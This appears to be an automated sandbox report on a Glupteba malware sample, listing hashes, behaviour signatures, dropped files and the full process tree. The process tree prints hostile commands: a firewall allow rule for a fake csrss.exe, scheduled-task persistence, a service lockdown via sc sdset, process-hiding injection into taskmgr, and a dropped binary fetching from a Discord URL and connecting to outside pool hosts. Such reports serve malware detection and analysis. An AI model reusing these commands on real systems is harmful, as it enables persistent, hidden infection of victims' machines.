Analysis
-
max time kernel
300s -
max time network
301s -
platform
windows10-2004_x64 -
resource
win10v2004-20240412-en -
resource tags
-
submitted
25-04-2024 02:48
General
-
Target
6779d89b7a368f4f3f340b50a9d18d71.exe
-
Size
4.1MB
-
MD5
c13b18a6553b1b79a3704791b0e39525
-
SHA1
72101789d2e3cf68f967e25cd13920bc6d53c3bf
-
SHA256
eef41ea97b49fd4d4e734808ee3c46b011521d01eb753b8e4d646c18569768cc
-
SHA512
af344c32b80933693889b89727887ff895bd0d4f8c1556fb1a4bbce85efe6f53bf76b57c661ee10759de70df51e77bf103c76632be28b4c75d1a9d922ea0f610
-
SSDEEP
98304:toa4fp94xsJrGehkJ1DdBF0TJiDxdyor/vCKqVsU:tfupiUGtp01Obgj
Malware Config
Signatures
-
Glupteba
Glupteba is a modular loader written in Golang with various components.
-
Glupteba payload 24 IoCs
-
Modifies Windows Firewall 2 TTPs 1 IoCs
-
Executes dropped EXE 7 IoCs
-
UPX packed file 13 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Adds Run key to start application 2 TTPs 2 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Manipulates WinMonFS driver. 1 IoCs
Roottkits write to WinMonFS to hide directories/files from being detected.
-
Drops file in System32 directory 10 IoCs
-
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
-
Drops file in Windows directory 4 IoCs
-
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Program crash 1 IoCs
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
GoLang User-Agent 2 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
-
Modifies data under HKEY_USERS 64 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 15 IoCs
-
Suspicious use of WriteProcessMemory 54 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\6779d89b7a368f4f3f340b50a9d18d71.exe"C:\Users\Admin\AppData\Local\Temp\6779d89b7a368f4f3f340b50a9d18d71.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2072 -s 24123⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\6779d89b7a368f4f3f340b50a9d18d71.exe"C:\Users\Admin\AppData\Local\Temp\6779d89b7a368f4f3f340b50a9d18d71.exe"2⤵
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes4⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Manipulates WinMonFS driver.
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F4⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F4⤵
- Creates scheduled task(s)
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)6⤵
- Launches sc.exe
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exeC:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe -xor=al2xoqueel0She4t -m=https://cdn.discordapp.com/attachments/1225871855328559147/1225878907014615161/kVYazCOZSwqudV?ex=6622bbb3&is=661046b3&hm=c80160577fcc82f0e337c537bdd214d60583ed75bb187a016d90f94471fc09b0& -pool tls://showlock.net:40001 -pool tls://showlock.net:443 -pool tcp://showlock.net:804⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exeC:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exeC:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2072 -ip 20721⤵
-
C:\Windows\windefender.exeC:\Windows\windefender.exe1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
Network
MITRE ATT&CK Matrix ATT&CK v13
Persistence
Create or Modify System Process
1Windows Service
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Privilege Escalation
Create or Modify System Process
1Windows Service
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_52msa2cg.gx1.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exeFilesize
2.0MB
MD51bf850b4d9587c1017a75a47680584c4
SHA175cd4738ffc07f203c3f3356bc946fdd0bcdbe19
SHA256ac470c2fa05a67dd03cdc427e9957e661cd0ec7aecd9682ddb0b32c5cfc18955
SHA512ed57be8c5a982bcbf901c2b035eb010e353508e7c7df338adc6e5c307e94427645e5f5ec28667fd861420b9411b4ade96ea6987519ed65e6c1d905b6eadfce08
-
C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exeFilesize
2.8MB
MD5713674d5e968cbe2102394be0b2bae6f
SHA190ac9bd8e61b2815feb3599494883526665cb81e
SHA256f724b2849e7dc38bf62114c11092020073bea509e2bc57dea7a94a2fc9c23057
SHA512e9fba80067ac39d5907560abd044bb97dfcf078db2b6696ff4ca5990d9803a0c24b39d04e05682ac3dac8bc472e2ee0c573a46514e907f4d9673d4e7a76caafb
-
C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exeFilesize
2.0MB
MD5dcb505dc2b9d8aac05f4ca0727f5eadb
SHA14f633edb62de05f3d7c241c8bc19c1e0be7ced75
SHA25661f9194b9f33611ec902f02755cf2e86f0bbc84c2102c6e5d1874f9bae78e551
SHA51231e1fce9aca3b5d9afc85640af04b4542b9897f7d60b699e3153516137d9358d3c101cacc04e9e594e36b8622e9489cecf0dda210662563565d80fb9a33549b3
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeFilesize
281KB
MD5d98e33b66343e7c96158444127a117f6
SHA1bb716c5509a2bf345c6c1152f6e3e1452d39d50d
SHA2565de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1
SHA512705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logFilesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-InteractiveFilesize
19KB
MD5472c5b9b97680a5a4610664f25b0fd59
SHA11b0d40f6c03645cd52164b25af9040bff0fddb1a
SHA2568a751fe467cd06a64d6d8e6aecc3c5d103d2553e3432d92dac05bacfb464a6e4
SHA51247b73dcebd2235610c1e37d53eb744b907aaee6eeedecb17dbb8274805346b1eee9a8042533ee41a79cf617afdb3a67d63d4c275692aa225fcebd9e55ea68728
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-InteractiveFilesize
19KB
MD50449e6a4ef3eeabd0ecd937d254b925f
SHA14f4439baca2041ca6c025a6aba80f5e41cfd909a
SHA256237cdfa888b276c2c17443e921e7d5b7e41a474d8421cddda5fa80abbd9a0a2e
SHA512e21af122cb4200f7f46065dc1f69c228a3227a11dd0124bc7054dae6d5c0b654d5df87f739335f6c228d31761e69342adf851f4681271f72fd34315a106719ff
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-InteractiveFilesize
19KB
MD5106f6de72354ecd4d039ce7b97a33fd7
SHA197146d39a05903a01193f5e38ba5fdc9d5b5fbef
SHA2568e5846718a7a9954a78c64f1b8e482e04fa0e38d1e8b7c6713484ccc5aa80438
SHA51285ce7aaa7c6f03e19f18b09d327c55ab6fa8fdfbc93d21bed775aa2d433f0e4acedfc4a4ee920683e91f5b6bf6a6cf3d5d324038ae670b4a58298be2d012349f
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-InteractiveFilesize
19KB
MD5d0c10b66fcb699ee76212be4b26f8256
SHA1276c28acaef7e119e06023c5d02d7a09a95c23b9
SHA25652f2a52fcb28974b7819ca190db479cf9ebdc3faf84dbc524ea2ba950c8f9dd5
SHA512c66703926aa8c9ec48fa317d9df660071b87c8596c69121d3bedab73086e62d8fb7332ff26d0bdb006a76059534580a0fd88c220cf95cc0047c1445a0b8c8640
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-InteractiveFilesize
19KB
MD5aecda2cef5fe927e52969f23c9356ee8
SHA1241d4810b7603cd583afc1ca361732054767a012
SHA25676be9af88d71f1ee52762b820df1c80e61af0dbbcd013f6afbd495e44f9cdada
SHA512033e903dc5c1be17f594a26153d7389b7d9b3419d55aba91a88fd52f83ad477c99007c33c0ee76b8d112aff8f1671cbd2d1428a120f09dea30377435bfd3a2ee
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-InteractiveFilesize
19KB
MD534271ff5557781bd0e6d07ab572b26d2
SHA1aefc8def3f72c646f41f53a7ef2a4c23e8268393
SHA256e7c3d553d221b9a5464db7c48f6a8f193da4c624b6a855309ecd2c0f7e510768
SHA5127f163fa89ca66f2e358a68ca8b6fce5ee2b4bb4c580d896fb9d4fa839be3d6199c17854a74b9e591cee4e3de9ab4d4d527de4df8c65be320955a9b9c552fddc5
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-InteractiveFilesize
19KB
MD56ae7eb859955d61750686d3d17031d84
SHA1189ee5d8a0d5a16b258a39b41505fc6e3ba8afb2
SHA25630774b7a3c0db64031f2e0f64628c4c858f9c2c1e9e37bdc9ee8408d7aab1314
SHA5126b40bbc70c5c9fda2d71ef0512293bdf395d5850df479c3eeea918fcc22b7e245c0d52c5cb63181bb33292f7e0f148cb908dc8502a0dc79ddfcff42b0f18ad48
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-InteractiveFilesize
19KB
MD51234390a290ebfbe835635aebab93b8e
SHA11be9dc80ba7ea826a03f571f0b64522b856b9d76
SHA256f540dd02d319b3b15963b50f24199d2d0838ce5ce74510728644eb47525fe6ab
SHA5124fe198710df92fea103a18af473248a4848d8ba77dc4e3df6a7839fd87e99601b9eb80d08f92ffa53894fee72b62167197b2f04c6e562702e5342eddbd227f46
-
C:\Windows\rss\csrss.exeFilesize
4.1MB
MD5c13b18a6553b1b79a3704791b0e39525
SHA172101789d2e3cf68f967e25cd13920bc6d53c3bf
SHA256eef41ea97b49fd4d4e734808ee3c46b011521d01eb753b8e4d646c18569768cc
SHA512af344c32b80933693889b89727887ff895bd0d4f8c1556fb1a4bbce85efe6f53bf76b57c661ee10759de70df51e77bf103c76632be28b4c75d1a9d922ea0f610
-
C:\Windows\windefender.exeFilesize
2.0MB
MD58e67f58837092385dcf01e8a2b4f5783
SHA1012c49cfd8c5d06795a6f67ea2baf2a082cf8625
SHA256166ddb03ff3c89bd4525ac390067e180fdd08f10fbcf4aadb0189541673c03fa
SHA51240d8ae12663fc1851e171d9d86cea8bb12487b734c218d7b6f9742eb07d4ca265065cbd6d0bb908f8bda7e3d955c458dfe3fd13265bbf573b9351e0a2bf691ec
-
memory/1144-259-0x0000000000400000-0x00000000008DF000-memory.dmpFilesize
4.9MB
-
memory/1144-274-0x0000000000400000-0x00000000008DF000-memory.dmpFilesize
4.9MB
-
memory/1144-265-0x0000000000400000-0x00000000008DF000-memory.dmpFilesize
4.9MB
-
memory/1720-412-0x0000000000400000-0x00000000008E8000-memory.dmpFilesize
4.9MB
-
memory/1720-418-0x0000000000400000-0x00000000008E8000-memory.dmpFilesize
4.9MB
-
memory/1780-1-0x0000000004690000-0x0000000004A89000-memory.dmpFilesize
4.0MB
-
memory/1780-44-0x0000000000400000-0x0000000004415000-memory.dmpFilesize
64.1MB
-
memory/1780-2-0x0000000006430000-0x0000000006D1B000-memory.dmpFilesize
8.9MB
-
memory/1780-47-0x0000000006430000-0x0000000006D1B000-memory.dmpFilesize
8.9MB
-
memory/2072-21-0x0000000005FD0000-0x0000000005FEE000-memory.dmpFilesize
120KB
-
memory/2072-24-0x00000000072F0000-0x0000000007366000-memory.dmpFilesize
472KB
-
memory/2072-42-0x0000000007690000-0x000000000769A000-memory.dmpFilesize
40KB
-
memory/2072-41-0x00000000075A0000-0x0000000007643000-memory.dmpFilesize
652KB
-
memory/2072-30-0x0000000070E10000-0x0000000071164000-memory.dmpFilesize
3.3MB
-
memory/2072-40-0x0000000007580000-0x000000000759E000-memory.dmpFilesize
120KB
-
memory/2072-29-0x0000000070C90000-0x0000000070CDC000-memory.dmpFilesize
304KB
-
memory/2072-28-0x0000000007540000-0x0000000007572000-memory.dmpFilesize
200KB
-
memory/2072-27-0x000000007FC10000-0x000000007FC20000-memory.dmpFilesize
64KB
-
memory/2072-26-0x0000000007390000-0x00000000073AA000-memory.dmpFilesize
104KB
-
memory/2072-25-0x00000000079F0000-0x000000000806A000-memory.dmpFilesize
6.5MB
-
memory/2072-43-0x0000000074DF0000-0x00000000755A0000-memory.dmpFilesize
7.7MB
-
memory/2072-23-0x0000000006530000-0x0000000006574000-memory.dmpFilesize
272KB
-
memory/2072-22-0x0000000006010000-0x000000000605C000-memory.dmpFilesize
304KB
-
memory/2072-3-0x00000000049C0000-0x00000000049F6000-memory.dmpFilesize
216KB
-
memory/2072-20-0x0000000005AF0000-0x0000000005E44000-memory.dmpFilesize
3.3MB
-
memory/2072-15-0x0000000005900000-0x0000000005966000-memory.dmpFilesize
408KB
-
memory/2072-9-0x0000000005890000-0x00000000058F6000-memory.dmpFilesize
408KB
-
memory/2072-8-0x00000000056A0000-0x00000000056C2000-memory.dmpFilesize
136KB
-
memory/2072-7-0x0000000005030000-0x0000000005658000-memory.dmpFilesize
6.2MB
-
memory/2072-6-0x0000000002990000-0x00000000029A0000-memory.dmpFilesize
64KB
-
memory/2072-4-0x0000000074DF0000-0x00000000755A0000-memory.dmpFilesize
7.7MB
-
memory/2072-5-0x0000000002990000-0x00000000029A0000-memory.dmpFilesize
64KB
-
memory/2220-256-0x0000000000400000-0x00000000008DF000-memory.dmpFilesize
4.9MB
-
memory/2320-112-0x00000000049C0000-0x00000000049D0000-memory.dmpFilesize
64KB
-
memory/2320-89-0x00000000049C0000-0x00000000049D0000-memory.dmpFilesize
64KB
-
memory/2320-99-0x0000000005B60000-0x0000000005EB4000-memory.dmpFilesize
3.3MB
-
memory/2320-88-0x00000000049C0000-0x00000000049D0000-memory.dmpFilesize
64KB
-
memory/2320-101-0x0000000070D90000-0x0000000070DDC000-memory.dmpFilesize
304KB
-
memory/2320-87-0x0000000074E90000-0x0000000075640000-memory.dmpFilesize
7.7MB
-
memory/2320-102-0x0000000070F10000-0x0000000071264000-memory.dmpFilesize
3.3MB
-
memory/2320-113-0x00000000049C0000-0x00000000049D0000-memory.dmpFilesize
64KB
-
memory/2320-115-0x0000000074E90000-0x0000000075640000-memory.dmpFilesize
7.7MB
-
memory/2856-299-0x0000000000400000-0x0000000004415000-memory.dmpFilesize
64.1MB
-
memory/2856-260-0x0000000000400000-0x0000000004415000-memory.dmpFilesize
64.1MB
-
memory/2856-414-0x0000000000400000-0x0000000004415000-memory.dmpFilesize
64.1MB
-
memory/2856-409-0x0000000000400000-0x0000000004415000-memory.dmpFilesize
64.1MB
-
memory/2856-334-0x0000000000400000-0x0000000004415000-memory.dmpFilesize
64.1MB
-
memory/2856-296-0x0000000000400000-0x0000000004415000-memory.dmpFilesize
64.1MB
-
memory/2856-293-0x0000000000400000-0x0000000004415000-memory.dmpFilesize
64.1MB
-
memory/2856-290-0x0000000000400000-0x0000000004415000-memory.dmpFilesize
64.1MB
-
memory/2856-287-0x0000000000400000-0x0000000004415000-memory.dmpFilesize
64.1MB
-
memory/2856-148-0x0000000004A00000-0x0000000004E00000-memory.dmpFilesize
4.0MB
-
memory/2856-149-0x00000000067A0000-0x000000000708B000-memory.dmpFilesize
8.9MB
-
memory/2856-284-0x0000000000400000-0x0000000004415000-memory.dmpFilesize
64.1MB
-
memory/2856-281-0x0000000000400000-0x0000000004415000-memory.dmpFilesize
64.1MB
-
memory/2856-278-0x0000000000400000-0x0000000004415000-memory.dmpFilesize
64.1MB
-
memory/2856-275-0x0000000000400000-0x0000000004415000-memory.dmpFilesize
64.1MB
-
memory/2856-272-0x0000000000400000-0x0000000004415000-memory.dmpFilesize
64.1MB
-
memory/2856-269-0x0000000000400000-0x0000000004415000-memory.dmpFilesize
64.1MB
-
memory/2856-247-0x0000000000400000-0x0000000004415000-memory.dmpFilesize
64.1MB
-
memory/2856-266-0x0000000000400000-0x0000000004415000-memory.dmpFilesize
64.1MB
-
memory/2856-263-0x0000000000400000-0x0000000004415000-memory.dmpFilesize
64.1MB
-
memory/2856-257-0x0000000000400000-0x0000000004415000-memory.dmpFilesize
64.1MB
-
memory/3004-80-0x0000000007390000-0x00000000073A4000-memory.dmpFilesize
80KB
-
memory/3004-48-0x0000000074E90000-0x0000000075640000-memory.dmpFilesize
7.7MB
-
memory/3004-76-0x0000000007020000-0x00000000070C3000-memory.dmpFilesize
652KB
-
memory/3004-64-0x0000000071530000-0x0000000071884000-memory.dmpFilesize
3.3MB
-
memory/3004-77-0x0000000007410000-0x00000000074A6000-memory.dmpFilesize
600KB
-
memory/3004-78-0x0000000007340000-0x0000000007351000-memory.dmpFilesize
68KB
-
memory/3004-79-0x0000000007380000-0x000000000738E000-memory.dmpFilesize
56KB
-
memory/3004-74-0x0000000004B70000-0x0000000004B80000-memory.dmpFilesize
64KB
-
memory/3004-75-0x0000000004B70000-0x0000000004B80000-memory.dmpFilesize
64KB
-
memory/3004-63-0x0000000070D90000-0x0000000070DDC000-memory.dmpFilesize
304KB
-
memory/3004-81-0x00000000073D0000-0x00000000073EA000-memory.dmpFilesize
104KB
-
memory/3004-85-0x0000000074E90000-0x0000000075640000-memory.dmpFilesize
7.7MB
-
memory/3004-82-0x00000000073C0000-0x00000000073C8000-memory.dmpFilesize
32KB
-
memory/3004-50-0x0000000004B70000-0x0000000004B80000-memory.dmpFilesize
64KB
-
memory/3004-49-0x0000000004B70000-0x0000000004B80000-memory.dmpFilesize
64KB
-
memory/3004-60-0x00000000057E0000-0x0000000005B34000-memory.dmpFilesize
3.3MB
-
memory/3004-61-0x0000000005E70000-0x0000000005EBC000-memory.dmpFilesize
304KB
-
memory/3004-62-0x000000007F2D0000-0x000000007F2E0000-memory.dmpFilesize
64KB
-
memory/3188-195-0x0000000000400000-0x0000000004415000-memory.dmpFilesize
64.1MB
-
memory/3188-118-0x00000000048E0000-0x0000000004CDC000-memory.dmpFilesize
4.0MB
-
memory/3188-46-0x00000000048E0000-0x0000000004CDC000-memory.dmpFilesize
4.0MB
-
memory/3464-410-0x0000000000E10000-0x00000000016DD000-memory.dmpFilesize
8.8MB
-
memory/3464-415-0x0000000000E10000-0x00000000016DD000-memory.dmpFilesize
8.8MB
-
memory/4088-340-0x0000000000400000-0x00000000008E1000-memory.dmpFilesize
4.9MB
-
memory/4088-150-0x0000000074E90000-0x0000000075640000-memory.dmpFilesize
7.7MB
-
memory/4360-131-0x0000000071530000-0x0000000071884000-memory.dmpFilesize
3.3MB
-
memory/4360-116-0x0000000074E90000-0x0000000075640000-memory.dmpFilesize
7.7MB
-
memory/4360-130-0x000000007F8D0000-0x000000007F8E0000-memory.dmpFilesize
64KB
-
memory/4360-129-0x0000000070D90000-0x0000000070DDC000-memory.dmpFilesize
304KB
-
memory/4360-142-0x0000000074E90000-0x0000000075640000-memory.dmpFilesize
7.7MB
-
memory/4360-117-0x0000000005170000-0x0000000005180000-memory.dmpFilesize
64KB